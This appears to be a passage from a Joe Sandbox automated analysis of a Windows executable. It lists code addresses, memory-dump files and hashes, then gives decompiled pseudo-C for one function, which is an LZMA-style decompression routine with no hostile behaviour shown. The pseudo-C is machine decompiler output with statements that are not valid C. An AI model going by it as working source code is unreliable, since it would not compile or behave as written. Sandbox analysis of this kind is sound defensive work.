0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x00000000
0x00000000
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00000000
0x00407321
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00000000
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00407484
0x0040748a
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x004073c3
0x00000000
0x00407238

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F4A() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004074A1))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4)); // executed
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
